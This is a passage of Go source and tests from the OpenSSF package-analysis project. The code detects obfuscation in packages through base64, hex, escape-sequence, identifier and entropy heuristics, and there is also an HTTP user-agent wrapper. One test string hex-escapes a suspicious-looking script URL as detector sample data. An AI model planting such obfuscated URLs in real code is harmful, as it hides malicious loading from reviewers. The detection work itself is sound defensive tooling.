55 | 56 | func FindStringsInFile(filePath string, stringRegexp *regexp.Regexp) (*ExtractedStrings, error) { 57 | fileBytes, err := os.ReadFile(filePath) 58 | if err != nil { 59 | return nil, err 60 | } 61 | fileString := string(fileBytes) 62 | return FindStringsInCode(fileString, stringRegexp) 63 | } 64 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/analyze.go: -------------------------------------------------------------------------------- 1 | package signals 2 | 3 | import ( 4 | "unicode/utf8" 5 | 6 | "github.com/ossf/package-analysis/internal/staticanalysis/parsing" 7 | "github.com/ossf/package-analysis/internal/staticanalysis/signals/detections" 8 | "github.com/ossf/package-analysis/internal/utils" 9 | "github.com/ossf/package-analysis/pkg/api/staticanalysis" 10 | "github.com/ossf/package-analysis/pkg/api/staticanalysis/token" 11 | "github.com/ossf/package-analysis/pkg/valuecounts" 12 | ) 13 | 14 | // countLengths returns a map containing the aggregated lengths 15 | // of each of the strings in the input list 16 | func countLengths(symbols []string) valuecounts.ValueCounts { 17 | lengths := make([]int, 0, len(symbols)) 18 | for _, s := range symbols { 19 | lengths = append(lengths, utf8.RuneCountInString(s)) 20 | } 21 | 22 | return valuecounts.Count(lengths) 23 | } 24 | 25 | // AnalyzeSingle collects signals of interest for a file in a package, operating on a single 26 | // parsing result (i.e. from one language parser). It returns a FileSignals object, containing 27 | // information that may be useful to determine whether the file contains malicious code. 28 | func AnalyzeSingle(parseData parsing.SingleResult) FileSignals { 29 | identifierNames := utils.Transform(parseData.Identifiers, func(i token.Identifier) string { return i.Name }) 30 | stringLiterals := utils.Transform(parseData.StringLiterals, func(s token.String) string { return s.Value }) 31 | 32 | identifierLengths := countLengths(identifierNames) 33 | stringLengths := countLengths(stringLiterals) 34 | 35 | signals := FileSignals{ 36 | IdentifierLengths: identifierLengths, 37 | StringLengths: stringLengths, 38 | Base64Strings: []string{}, 39 | HexStrings: []string{}, 40 | EscapedStrings: []staticanalysis.EscapedString{}, 41 | SuspiciousIdentifiers: []staticanalysis.SuspiciousIdentifier{}, 42 | URLs: []string{}, 43 | IPAddresses: []string{}, 44 | } 45 | 46 | for _, name := range identifierNames { 47 | for rule, pattern := range detections.SuspiciousIdentifierPatterns { 48 | if pattern.MatchString(name) { 49 | signals.SuspiciousIdentifiers = append(signals.SuspiciousIdentifiers, staticanalysis.SuspiciousIdentifier{name, rule}) 50 | break // don't bother searching for multiple matching rules 51 | } 52 | } 53 | } 54 | 55 | for _, sl := range parseData.StringLiterals { 56 | signals.Base64Strings = append(signals.Base64Strings, detections.FindBase64Substrings(sl.Value)...) 57 | signals.HexStrings = append(signals.HexStrings, detections.FindHexSubstrings(sl.Value)...) 58 | signals.URLs = append(signals.URLs, detections.FindURLs(sl.Value)...) 59 | signals.IPAddresses = append(signals.IPAddresses, detections.FindIPAddresses(sl.Value)...) 60 | if detections.IsHighlyEscaped(sl, 8, 0.25) { 61 | escapedString := staticanalysis.EscapedString{ 62 | Value: sl.Value, 63 | Raw: sl.Raw, 64 | LevenshteinDist: sl.LevenshteinDist(), 65 | } 66 | signals.EscapedStrings = append(signals.EscapedStrings, escapedString) 67 | } 68 | } 69 | 70 | return signals 71 | } 72 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/detections/base64.go: -------------------------------------------------------------------------------- 1 | package detections 2 | 3 | import ( 4 | "regexp" 5 | "strings" 6 | ) 7 | 8 | var ( 9 | // RFC4648 standard base 64 chars, padding optional, min length 16. 10 | standardBase64 = regexp.MustCompile("[[:alnum:]+/]{16,}(?:={0,2})?") 11 | // RFC4648 url/file-safe base 64 chars, padding optional, min length 16. 12 | urlSafeBase64 = regexp.MustCompile("[[:alnum:]-_]{16,}(?:={0,2})?") 13 | // Combines RFC4648 standard ('+', '/') + file-safe ('-', '_') base 64 variants. 14 | base64Regex = regexp.MustCompile(standardBase64.String() + "|" + urlSafeBase64.String()) 15 | 16 | filterRegexes = []*regexp.Regexp{ 17 | regexp.MustCompile("[[:upper:]]"), 18 | regexp.MustCompile("[[:lower:]]"), 19 | regexp.MustCompile("[G-Zg-z]"), // non-hex letter 20 | } 21 | ) 22 | 23 | /* 24 | looksLikeActualBase64 checks a candidate base64 string (that matches base64Regex) 25 | using some rule-based heuristics to reduce false positive matching of e.g. 26 | long words, hex strings, file paths. Additionally, if the candidate string 27 | uses padding, its length is checked to ensure it is a multiple of 4 as required 28 | by the Base64 standard. 29 | */ 30 | func looksLikeActualBase64(candidate string) bool { 31 | if strings.ContainsRune(candidate, '=') && len(candidate)%4 != 0 { 32 | return false 33 | } 34 | 35 | for _, r := range filterRegexes { 36 | if !r.MatchString(candidate) { 37 | return false 38 | } 39 | } 40 | 41 | return true 42 | } 43 | 44 | /* 45 | FindBase64Substrings returns a slice containing all the non-overlapping substrings of s 46 | that are at least 20 characters long, and look like base64-encoded data. The function 47 | uses regex-based heuristics to determine valid substrings but does not decode the data. 48 | In particular, valid strings must have only valid base64 characters ([A-Za-z0-9+/] or 49 | [A-Za-z0-9-_], depending on the variant, plus up to 2 padding '=' characters). 50 | If padding characters are included, then the string length must be a multiple of 4. 51 | 52 | The following heuristic rules are checked to reduce the number of false positives. 53 | 54 | 1. Must have at least one uppercase letter 55 | 2. Must have at least one lowercase letter 56 | 3. Must have at least one letter outside A-F (or a-f) [this filters out hex strings] 57 | 4. If padding characters are included, the string length must be a multiple of 4 58 | 59 | While false positive matches will occur, due to the minimum length requirement 60 | it is highly unlikely that a legitimate base64 string will be excluded from the output. 61 | 62 | Note that, if there are multiple base64 encoded strings in the input, depending 63 | on how they are separated, they may end up being concatenated together into a single 64 | string in the returned string slice. 65 | */ 66 | func FindBase64Substrings(s string) []string { 67 | matches := []string{} 68 | 69 | for _, candidate := range base64Regex.FindAllString(s, -1) { 70 | if looksLikeActualBase64(candidate) { 71 | matches = append(matches, candidate) 72 | } 73 | } 74 | return matches 75 | } 76 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/detections/base64_test.go: -------------------------------------------------------------------------------- 1 | package detections 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | const longBase64String = "IkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0LCBjb25zZWN0ZXR1ciBhZGlwaXNjaW5nIGVsaXQsIHNlZCBkby" + 9 | "BlaXVzbW9kIHRlbXBvciBpbmNpZGlkdW50IHV0IGxhYm9yZSBldCBkb2xvcmUgbWFnbmEgYWxpcXVhLiBVdCBlbmltIGFkIG1pbmltIHZlb" + 10 | "mlhbSwgcXVpcyBub3N0cnVkIGV4ZXJjaXRhdGlvbiB1bGxhbWNvIGxhYm9yaXMgbmlzaSB1dCBhbGlxdWlwIGV4IGVhIGNvbW1vZG8gY29u" + 11 | "c2VxdWF0LiBEdWlzIGF1dGUgaXJ1cmUgZG9sb3IgaW4gcmVwcmVoZW5kZXJpdCBpbiB2b2x1cHRhdGUgdmVsaXQgZXNzZSBjaWxsdW0gZG9" + 12 | "sb3JlIGV1IGZ1Z2lhdCBudWxsYSBwYXJpYXR1ci4gRXhjZXB0ZXVyIHNpbnQgb2NjYWVjYXQgY3VwaWRhdGF0IG5vbiBwcm9pZGVudCwgc3V" + 13 | "udCBpbiBjdWxwYSBxdWkgb2ZmaWNpYSBkZXNlcnVudCBtb2xsaXQgYW5pbSBpZCBlc3QgbGFib3J1bS4i" 14 | 15 | func TestFindBase64Substrings(t *testing.T) { 16 | tests := []struct { 17 | name string 18 | input string 19 | output []string 20 | }{ 21 | {"empty", "", []string{}}, 22 | {"16 lowercase chars", "abcdefghijklmnop", []string{}}, 23 | {"16 uppercase chars", "ABCDEFGHIJKLMNOP", []string{}}, 24 | {"16 digits", "1234123412341234", []string{}}, 25 | {"16 chars lowercase hex", "0x0123456789abcd", []string{}}, 26 | {"16 chars uppercase hex", "0XABCDEF12345678", []string{}}, 27 | {"actual base64 no padding", "dGhpcyBpcyBhbiBvcmFuZ2UK", []string{"dGhpcyBpcyBhbiBvcmFuZ2UK"}}, 28 | {"actual base64 1 padding", "dGhpcyBpcyBhIHBlYXI=", []string{"dGhpcyBpcyBhIHBlYXI="}}, 29 | {"actual base64 2 padding", "dGhpcyBpcyBhbiBhcHBsZQ==", []string{"dGhpcyBpcyBhbiBhcHBsZQ=="}}, 30 | {"actual base64 3 padding", "0XABCDEF12345678", []string{}}, 31 | {"long base64 string", longBase64String, []string{longBase64String}}, 32 | { 33 | "multiple base64 strings", longBase64String + " " + longBase64String, 34 | []string{longBase64String, longBase64String}, 35 | }, 36 | { 37 | "multiple base64 strings 2", longBase64String + "!!!!====!!" + longBase64String, 38 | []string{longBase64String, longBase64String}, 39 | }, 40 | } 41 | for _, tt := range tests { 42 | t.Run(tt.name, func(t *testing.T) { 43 | if got := FindBase64Substrings(tt.input); !reflect.DeepEqual(got, tt.output) { 44 | t.Errorf("FindBase64Substrings() = %v, want %v", got, tt.output) 45 | } 46 | }) 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/detections/escape_sequences.go: -------------------------------------------------------------------------------- 1 | package detections 2 | 3 | import ( 4 | "regexp" 5 | 6 | "github.com/ossf/package-analysis/pkg/api/staticanalysis/token" 7 | ) 8 | 9 | /* 10 | Escape sequences are defined by the regexes below. While octal, hex and 11 | short/16-bit unicode escape sequences are mostly consistent across languages, 12 | 32-bit unicode (code point) escape sequences are more variable. 13 | v1 appears in JS, PHP, Ruby while v2 appears in Python, C, Rust, Go. 14 | */ 15 | var ( 16 | octalEscape = regexp.MustCompile(`\\[0-7]{1,3}`) // e.g "\077", "\251" 17 | hexEscape = regexp.MustCompile(`\\x[[:xdigit:]]{2}`) // e.g. "\x2a", "\x3f" 18 | unicodeEscape = regexp.MustCompile(`\\u[[:xdigit:]]{4}`) // e.g. "\u00af", "\u83bd" 19 | codePointEscapeV1 = regexp.MustCompile(`\\u\{[[:xdigit:]]+}`) // e.g. "\u{1ECC2}", \u{001FFF}" 20 | codePointEscapeV2 = regexp.MustCompile(`\\U[[:xdigit:]]{8}`) // e.g. "\U0001ECC2", "\U00001FFF" 21 | 22 | allEscapeSequences = []*regexp.Regexp{octalEscape, hexEscape, unicodeEscape, codePointEscapeV1, codePointEscapeV2} 23 | ) 24 | 25 | /* 26 | IsHighlyEscaped returns true if a string literal exceeds the given 27 | threshold count or frequency (in range [0, 1]) of escape sequences. 28 | 29 | Supported escape sequences include: 30 | 31 | 1. Octal escape: "\251", 32 | 2. Hex escape: "\x3f", 33 | 3. Unicode 16-bit escape: "\u103a", 34 | 4. Unicode 32-bit escape: "\U00100FFF" or "\u{0100FF}". 35 | */ 36 | func IsHighlyEscaped(s token.String, thresholdCount int, thresholdFrequency float64) bool { 37 | escapeCount := 0 38 | 39 | for _, escapeSequencePattern := range allEscapeSequences { 40 | escapeCount += len(escapeSequencePattern.FindAllStringIndex(s.Raw, -1)) 41 | } 42 | 43 | length := float64(len([]rune(s.Value))) // convert to rune slice first to count codepoints, not bytes 44 | return escapeCount >= thresholdCount || float64(escapeCount)/length >= thresholdFrequency 45 | } 46 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/detections/escape_sequences_test.go: -------------------------------------------------------------------------------- 1 | package detections 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/ossf/package-analysis/pkg/api/staticanalysis/token" 7 | ) 8 | 9 | func TestIsHighlyEscaped(t *testing.T) { 10 | tests := []struct { 11 | name string 12 | literal token.String 13 | want bool 14 | }{ 15 | { 16 | name: "empty", 17 | literal: token.String{}, 18 | want: false, 19 | }, 20 | { 21 | name: "non escaped", 22 | literal: token.String{ 23 | Value: "the quick brown fox jumps over the lazy dog", 24 | Raw: "the quick brown fox jumps over the lazy dog", 25 | }, 26 | want: false, 27 | }, 28 | { 29 | name: "octal with readable chars", 30 | literal: token.String{ 31 | Value: "©SSTT", 32 | Raw: "\"\\251\\123\\123\\124\\124\"", 33 | }, 34 | want: true, 35 | }, 36 | { 37 | name: "hex with readable chars", 38 | literal: token.String{ 39 | Value: "https://js-metrics.com/minjs.php?pl=", 40 | Raw: "\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x6A\\x73\\x2D\\x6D\\x65\\x74\\x72\\x69\\x63\\x73\\x2E\\x63\\x6F\\x6D\\x2F\\x6D\\x69\\x6E\\x6A\\x73\\x2E\\x70\\x68\\x70\\x3F\\x70\\x6C\\x3D\"", 41 | }, 42 | want: true, 43 | }, 44 | { 45 | name: "16-bit unicode with non-readable chars", 46 | literal: token.String{ 47 | Value: "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1", 48 | Raw: "\"\\u09ab\\u09c7\\u09ac\\u09cd\\u09b0\\u09c1\"", 49 | }, 50 | want: true, 51 | }, 52 | { 53 | name: "32-bit v1 unicode with non-readable chars", 54 | literal: token.String{ 55 | Value: "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1", 56 | Raw: "\"\\u{09ab}\\u{09c7}\\u{09ac}\\u{09cd}\\u{09b0}\\u{09c1}\"", 57 | }, 58 | want: true, 59 | }, 60 | { 61 | name: "32-bit v2 unicode with non-readable chars", 62 | literal: token.String{ 63 | Value: "\U000009ab\U000009c7\U000009ac\U000009cd\U000009b0\U000009c1", 64 | Raw: "\"\\U000009ab\\U000009c7\\U000009ac\\U000009cd\\U000009b0\\U000009c1\"", 65 | }, 66 | want: true, 67 | }, 68 | } 69 | for _, tt := range tests { 70 | t.Run(tt.name, func(t *testing.T) { 71 | if got := IsHighlyEscaped(tt.literal, 8, 0.25); got != tt.want { 72 | t.Errorf("IsHighlyEscaped() = %v, want %v", got, tt.want) 73 | } 74 | }) 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/detections/hex_strings.go: -------------------------------------------------------------------------------- 1 | package detections 2 | 3 | import ( 4 | "regexp" 5 | ) 6 | 7 | var hexRegex = regexp.MustCompile("[[:xdigit:]]{8,}") 8 | 9 | /* 10 | FindHexSubstrings returns all non-overlapping substrings of s 11 | made up of at least 8 consecutive hexadecimal digits. 12 | The leading 0x is not counted. 13 | */ 14 | func FindHexSubstrings(s string) []string { 15 | return hexRegex.FindAllString(s, -1) 16 | } 17 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/detections/hex_strings_test.go: -------------------------------------------------------------------------------- 1 | package detections 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | func TestFindHexSubstrings(t *testing.T) { 9 | tests := []struct { 10 | name string 11 | input string 12 | want []string 13 | }{ 14 | { 15 | name: "empty", 16 | input: "", 17 | want: nil, 18 | }, 19 | { 20 | name: "not hex", 21 | input: "abcdefghijklmnop", 22 | want: nil, 23 | }, 24 | { 25 | name: "single hex", 26 | input: "abcdefabcdef12344", 27 | want: []string{"abcdefabcdef12344"}, 28 | }, 29 | { 30 | name: "two hex", 31 | input: "abcdefabcdef12344, 09acb8921308bac4", 32 | want: []string{"abcdefabcdef12344", "09acb8921308bac4"}, 33 | }, 34 | { 35 | name: "hex with prefix and non-hex suffix", 36 | input: "0xabcdefabcdef1234b09acb8921308bac4@02345", 37 | want: []string{"abcdefabcdef1234b09acb8921308bac4"}, 38 | }, 39 | } 40 | for _, tt := range tests { 41 | t.Run(tt.name, func(t *testing.T) { 42 | if got := FindHexSubstrings(tt.input); !reflect.DeepEqual(got, tt.want) { 43 | t.Errorf("FindHexSubstrings() = %v, want %v", got, tt.want) 44 | } 45 | }) 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/detections/suspicious_identifiers.go: -------------------------------------------------------------------------------- 1 | package detections 2 | 3 | import "regexp" 4 | 5 | var ( 6 | hexIdentifier = regexp.MustCompile("_0x[[:xdigit:]]{3,}") 7 | numericIdentifier = regexp.MustCompile("^[A-Za-z_]\\d{3,}") 8 | singleCharIdentifier = regexp.MustCompile("^[A-Za-z_]$") 9 | ) 10 | 11 | /* 12 | SuspiciousIdentifierPatterns is a list of regex patterns to match source code 13 | identifiers that are carry a suspicion of being obfuscated, due to being not 14 | very human-friendly. A few matching identifiers may not indicate obfuscation, 15 | but if there is a large number of suspicious identifiers (especially of the 16 | same type) then obfuscation is probable. 17 | */ 18 | var SuspiciousIdentifierPatterns = map[string]*regexp.Regexp{ 19 | "hex": hexIdentifier, 20 | "numeric": numericIdentifier, 21 | "single": singleCharIdentifier, 22 | } 23 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/file_signals.go: -------------------------------------------------------------------------------- 1 | package signals 2 | 3 | import ( 4 | "fmt" 5 | "strings" 6 | 7 | "github.com/ossf/package-analysis/pkg/api/staticanalysis" 8 | "github.com/ossf/package-analysis/pkg/valuecounts" 9 | ) 10 | 11 | // FileSignals holds information related to the presence of obfuscated code in a single file. 12 | type FileSignals struct { 13 | // The following two variables respectively record how many string literals 14 | // and identifiers in the file have a given length. The absence of a count 15 | // for a particular lengths means that there were no symbols of that length 16 | // in the file. 17 | IdentifierLengths valuecounts.ValueCounts 18 | StringLengths valuecounts.ValueCounts 19 | 20 | // SuspiciousIdentifiers holds identifiers that are deemed 'suspicious' (i.e. 21 | // indicative of obfuscation) according to certain rules. Each entry contains 22 | // the identifier name and the name of the first rule it was matched against. 23 | SuspiciousIdentifiers []staticanalysis.SuspiciousIdentifier 24 | 25 | // EscapedStrings contain string literals that contain large amount of escape 26 | // characters, which may indicate obfuscation. 27 | EscapedStrings []staticanalysis.EscapedString 28 | 29 | // Base64Strings holds a list of (substrings of) string literals found in the 30 | // file that match a base64 regex pattern. This patten has a minimum matching 31 | // length in order to reduce the number of false positives. 32 | Base64Strings []string 33 | 34 | // HexStrings holds a list of (substrings of) string literals found in the 35 | // file that contain long (>8 digits) hexadecimal digit sequences. 36 | HexStrings []string 37 | 38 | // IPAddresses contains any IP addresses found in string literals 39 | IPAddresses []string 40 | 41 | // URLs contains any urls (http or https) found in string literals 42 | URLs []string 43 | } 44 | 45 | func (s FileSignals) String() string { 46 | parts := []string{ 47 | fmt.Sprintf("identifier length counts: %v", s.IdentifierLengths), 48 | fmt.Sprintf("string length counts: %v", s.StringLengths), 49 | 50 | fmt.Sprintf("suspicious identifiers: %v", s.SuspiciousIdentifiers), 51 | fmt.Sprintf("escaped strings: %v", s.EscapedStrings), 52 | fmt.Sprintf("potential base64 strings: %v", s.Base64Strings), 53 | fmt.Sprintf("hex strings: %v", s.HexStrings), 54 | fmt.Sprintf("IP addresses: %v", s.IPAddresses), 55 | fmt.Sprintf("URLs: %v", s.URLs), 56 | } 57 | return strings.Join(parts, "\n") 58 | } 59 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/stats/sample_statistics_test.go: -------------------------------------------------------------------------------- 1 | package stats 2 | 3 | import ( 4 | "math" 5 | "testing" 6 | ) 7 | 8 | func TestSummary(t *testing.T) { 9 | data := []int{1, 2, 3, 4, 5, 6, 7, 8, 9} 10 | actual := Summarise(data) 11 | expected := SampleStatistics{ 12 | Size: 9, 13 | Mean: 5, 14 | Variance: 7.5, 15 | Skewness: 0, 16 | Quartiles: [5]float64{1, 3, 5, 7, 9}, 17 | } 18 | if !actual.Equals(expected, 1e-4) { 19 | t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual) 20 | } 21 | } 22 | 23 | func TestSummary2(t *testing.T) { 24 | data := []int{36, 7, 40, 41, 6, 42, 43, 47, 49, 15, 39} 25 | actual := Summarise(data) 26 | expected := SampleStatistics{ 27 | Size: 11, 28 | Mean: 33.18181818181818, 29 | Variance: 251.9636363636363, 30 | Skewness: -1.0634150819204964, 31 | Quartiles: [5]float64{6, 15, 40, 43, 49}, 32 | } 33 | if !actual.Equals(expected, 1e-4) { 34 | t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual) 35 | } 36 | } 37 | 38 | func TestSummary3(t *testing.T) { 39 | data := []int{36, 40, 7, 39, 15, 41} 40 | actual := Summarise(data) 41 | expected := SampleStatistics{ 42 | Size: 6, 43 | Mean: 29.666666666666668, 44 | Variance: 218.26666666666665, 45 | Skewness: -1.039599522561593, 46 | Quartiles: [5]float64{7, 15, 37.5, 40, 41}, 47 | } 48 | if !actual.Equals(expected, 1e-4) { 49 | t.Errorf("Expected summary: %v\nactual summary: %v\n", expected, actual) 50 | } 51 | } 52 | 53 | func TestSummary4(t *testing.T) { 54 | var data []int 55 | actual := Summarise(data) 56 | nan := math.NaN() 57 | expected := SampleStatistics{ 58 | Size: 0, 59 | Mean: nan, 60 | Variance: nan, 61 | Skewness: nan, 62 | Quartiles: [5]float64{nan, nan, nan, nan, nan}, 63 | } 64 | if !actual.Equals(expected, 1e-4) { 65 | t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual) 66 | } 67 | } 68 | 69 | func TestSummary5(t *testing.T) { 70 | data := []float64{1.5} 71 | actual := Summarise(data) 72 | nan := math.NaN() 73 | expected := SampleStatistics{ 74 | Size: 1, 75 | Mean: 1.5, 76 | Variance: nan, 77 | Skewness: nan, 78 | Quartiles: [5]float64{1.5, 1.5, 1.5, 1.5, 1.5}, 79 | } 80 | if !actual.Equals(expected, 1e-4) { 81 | t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual) 82 | } 83 | } 84 | 85 | func TestSummary6(t *testing.T) { 86 | data := []float64{1.5, 2.5} 87 | actual := Summarise(data) 88 | nan := math.NaN() 89 | expected := SampleStatistics{ 90 | Size: 2, 91 | Mean: 2.0, 92 | Variance: 0.5, 93 | Skewness: nan, 94 | Quartiles: [5]float64{1.5, 1.5, 2.0, 2.5, 2.5}, 95 | } 96 | if !actual.Equals(expected, 1e-4) { 97 | t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual) 98 | } 99 | } 100 | 101 | func TestSummary7(t *testing.T) { 102 | data := []float64{-12.5, 0, 12.5} 103 | actual := Summarise(data) 104 | expected := SampleStatistics{ 105 | Size: 3, 106 | Mean: 0.0, 107 | Variance: 156.25, 108 | Skewness: 0, 109 | Quartiles: [5]float64{-12.5, -12.5, 0.0, 12.5, 12.5}, 110 | } 111 | if !actual.Equals(expected, 1e-4) { 112 | t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual) 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/stringentropy/string_entropy.go: -------------------------------------------------------------------------------- 1 | package stringentropy 2 | 3 | import ( 4 | "math" 5 | "unicode/utf8" 6 | ) 7 | 8 | /* 9 | Calculate finds the entropy of a string S of characters over an alphabet A, which is defined as 10 | 11 | E(S) = - sum(i in A) { (p(i)) * log(p(i)) }, 12 | 13 | where p(i) is the probability of observing character i, and the summation is performed over all characters in A. 14 | If S is the empty string, we define E(S) to be 0. 15 | 16 | The probabilities p(i) can be given a priori, or simply calculated by counting characters within the string S. 17 | In the latter case, we have p(i) = c(i) / |S|, where c(i) counts the number of times character i appears in S, 18 | and |S| is the length of S. Then, 19 | 20 | E(S) = - sum(i in A) { (c(i) / |S|) * log(c(i) / |S|) }. 21 | 22 | In this case, the maximum value for E is log(|S|). When the number of distinct characters in S is small, 23 | the entropy approaches 0. 24 | 25 | Reference: https://link.springer.com/chapter/10.1007/978-3-642-10509-8_19 26 | */ 27 | func Calculate(s string, prob map[rune]float64) float64 { 28 | if len(s) == 0 { 29 | return 0 30 | } 31 | 32 | if prob == nil { 33 | counts, sumCounts := CharacterCounts([]string{s}) 34 | prob = characterProbabilitiesFromCounts(counts, sumCounts) 35 | } 36 | 37 | entropy := 0.0 38 | for _, char := range s { 39 | p := prob[char] 40 | if p > 0 { 41 | entropy -= p * math.Log(p) 42 | } 43 | } 44 | 45 | return entropy 46 | } 47 | 48 | /* 49 | CalculateNormalised returns the string entropy normalised by the log of the length of the string. 50 | This quantity is used because for log(N) is the maximum possible entropy out of all strings with length N, 51 | where N > 0. Special cases are empty strings (0) and single character strings (1). 52 | As a formula: 53 | 54 | E_n(S) := { 55 | 0, if |S| = 0 56 | 1, if |S| = 1 57 | E(S) / log(|S|), otherwise 58 | } 59 | */ 60 | // TODO does this make sense when a general probability structure is used? 61 | // TODO calculate max string entropy for a given set of character counts. 62 | func CalculateNormalised(s string, prob map[rune]float64) float64 { 63 | length := utf8.RuneCountInString(s) 64 | switch length { 65 | case 0: 66 | return 0 67 | case 1: 68 | return 1 69 | default: 70 | return Calculate(s, prob) / math.Log(float64(length)) 71 | } 72 | } 73 | 74 | // CharacterCounts computes a map of character (rune) to number of occurrences 75 | // in the input strings 76 | func CharacterCounts(strs []string) (map[rune]int, int64) { 77 | counts := make(map[rune]int) 78 | var sumCounts int64 = 0 79 | for _, s := range strs { 80 | for _, b := range s { 81 | counts[b] += 1 82 | sumCounts += 1 83 | } 84 | } 85 | return counts, sumCounts 86 | } 87 | 88 | // CharacterProbabilities computes a map of character (rune) to 89 | // frequency/probability of occurrence in the input strings 90 | func CharacterProbabilities(strs []string) map[rune]float64 { 91 | counts, sumCounts := CharacterCounts(strs) 92 | return characterProbabilitiesFromCounts(counts, sumCounts) 93 | } 94 | 95 | func characterProbabilitiesFromCounts(counts map[rune]int, sumCounts int64) map[rune]float64 { 96 | prob := make(map[rune]float64, len(counts)) 97 | for char, count := range counts { 98 | prob[char] = float64(count) / float64(sumCounts) 99 | } 100 | return prob 101 | } 102 | -------------------------------------------------------------------------------- /internal/staticanalysis/task.go: -------------------------------------------------------------------------------- 1 | package staticanalysis 2 | 3 | // A Task (static analysis task) refers to a particular type of static analysis to be performed. 4 | // Some tasks may depend on other tasks, for example Signals depends on Parsing. 5 | type Task string 6 | 7 | // NOTE: the string values below should match the JSON field names in result.go. 8 | const ( 9 | // Basic analysis consists of information about a file that can be determined 10 | // without parsing, for example file size, file type and hash. 11 | Basic Task = "basic" 12 | 13 | // Parsing analysis involves using a programming language parser to extract 14 | // source code information from the file. 15 | Parsing Task = "parsing" 16 | 17 | // Signals analysis involves using applying certain detection rules to extract 18 | // signals of interest from the code. It depends on the output of the Parsing task, 19 | // and does not require reading files directly. 20 | Signals Task = "signals" 21 | 22 | // All is not a task itself, but represents/'depends on' all other tasks. 23 | All Task = "all" 24 | ) 25 | 26 | var allTasks = []Task{ 27 | Basic, 28 | Parsing, 29 | Signals, 30 | } 31 | 32 | func AllTasks() []Task { 33 | return allTasks[:] 34 | } 35 | 36 | func TaskFromString(s string) (Task, bool) { 37 | switch Task(s) { 38 | case Basic: 39 | return Basic, true 40 | case Parsing: 41 | return Parsing, true 42 | case Signals: 43 | return Signals, true 44 | case All: 45 | return All, true 46 | default: 47 | return "", false 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /internal/useragent/useragent.go: -------------------------------------------------------------------------------- 1 | package useragent 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | ) 7 | 8 | const defaultUserAgentFmt = "package-analysis (github.com/ossf/package-analysis%s)" 9 | 10 | type uaRoundTripper struct { 11 | parent http.RoundTripper 12 | userAgent string 13 | } 14 | 15 | // RoundTrip implements the http.RoundTripper interface. 16 | func (rt *uaRoundTripper) RoundTrip(req *http.Request) (*http.Response, error) { 17 | req.Header.Set("User-Agent", rt.userAgent) 18 | return rt.parent.RoundTrip(req) 19 | } 20 | 21 | // RoundTripper wraps parent with a RoundTripper that add a user-agent header 22 | // with the contents of ua. 23 | func RoundTripper(ua string, parent http.RoundTripper) http.RoundTripper { 24 | return &uaRoundTripper{ 25 | parent: parent, 26 | userAgent: ua, 27 | } 28 | } 29 | 30 | // DefaultRoundTripper wraps parent with a RoundTripper that adds a default 31 | // Package Analysis user-agent header. 32 | // 33 | // If supplied, extra information can be added to the user-agent, allowing the 34 | // user-agent to be customized for production environments. 35 | func DefaultRoundTripper(parent http.RoundTripper, extra string) http.RoundTripper { 36 | if extra != "" { 37 | extra = ", " + extra 38 | } 39 | return RoundTripper(fmt.Sprintf(defaultUserAgentFmt, extra), parent) 40 | } 41 | -------------------------------------------------------------------------------- /internal/useragent/useragent_test.go: -------------------------------------------------------------------------------- 1 | package useragent_test 2 | 3 | import ( 4 | "net/http" 5 | "net/http/httptest" 6 | "testing" 7 | 8 | "github.com/ossf/package-analysis/internal/useragent" 9 | ) 10 | 11 | func TestRoundTripper(t *testing.T) { 12 | want := "test user agent string" 13 | ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 14 | got := r.Header.Get("user-agent") 15 | if got != want { 16 | t.Errorf("User Agent = %q, want %q", got, want) 17 | } 18 | w.WriteHeader(http.StatusOK) 19 | })) 20 | defer ts.Close() 21 | 22 | c := http.Client{ 23 | Transport: useragent.RoundTripper(want, http.DefaultTransport), 24 | } 25 | resp, err := c.Get(ts.URL) 26 | if err != nil { 27 | t.Fatalf("Get() = %v; want no error", err) 28 | } 29 | if resp.StatusCode != http.StatusOK { 30 | t.Fatalf("Get() status = %v; want 200", resp.StatusCode) 31 | } 32 | } 33 | 34 | func TestDefaultRoundTripper(t *testing.T) { 35 | want := "package-analysis (github.com/ossf/package-analysis, extra)" 36 | ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 37 | got := r.Header.Get("user-agent") 38 | if got != want { 39 | t.Errorf("User Agent = %q, want %q", got, want) 40 | } 41 | w.WriteHeader(http.StatusOK) 42 | })) 43 | defer ts.Close() 44 | 45 | c := http.Client{ 46 | Transport: useragent.DefaultRoundTripper(http.DefaultTransport, "extra"), 47 | } 48 | resp, err := c.Get(ts.URL) 49 | if err != nil { 50 | t.Fatalf("Get() = %v; want no error", err) 51 | } 52 | if resp.StatusCode != http.StatusOK { 53 | t.Fatalf("Get() status = %v; want 200", resp.StatusCode) 54 | } 55 | } 56 | 57 | func TestDefaultRoundTripper_NoExtra(t *testing.T) { 58 | want := "package-analysis (github.com/ossf/package-analysis)" 59 | ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 60 | got := 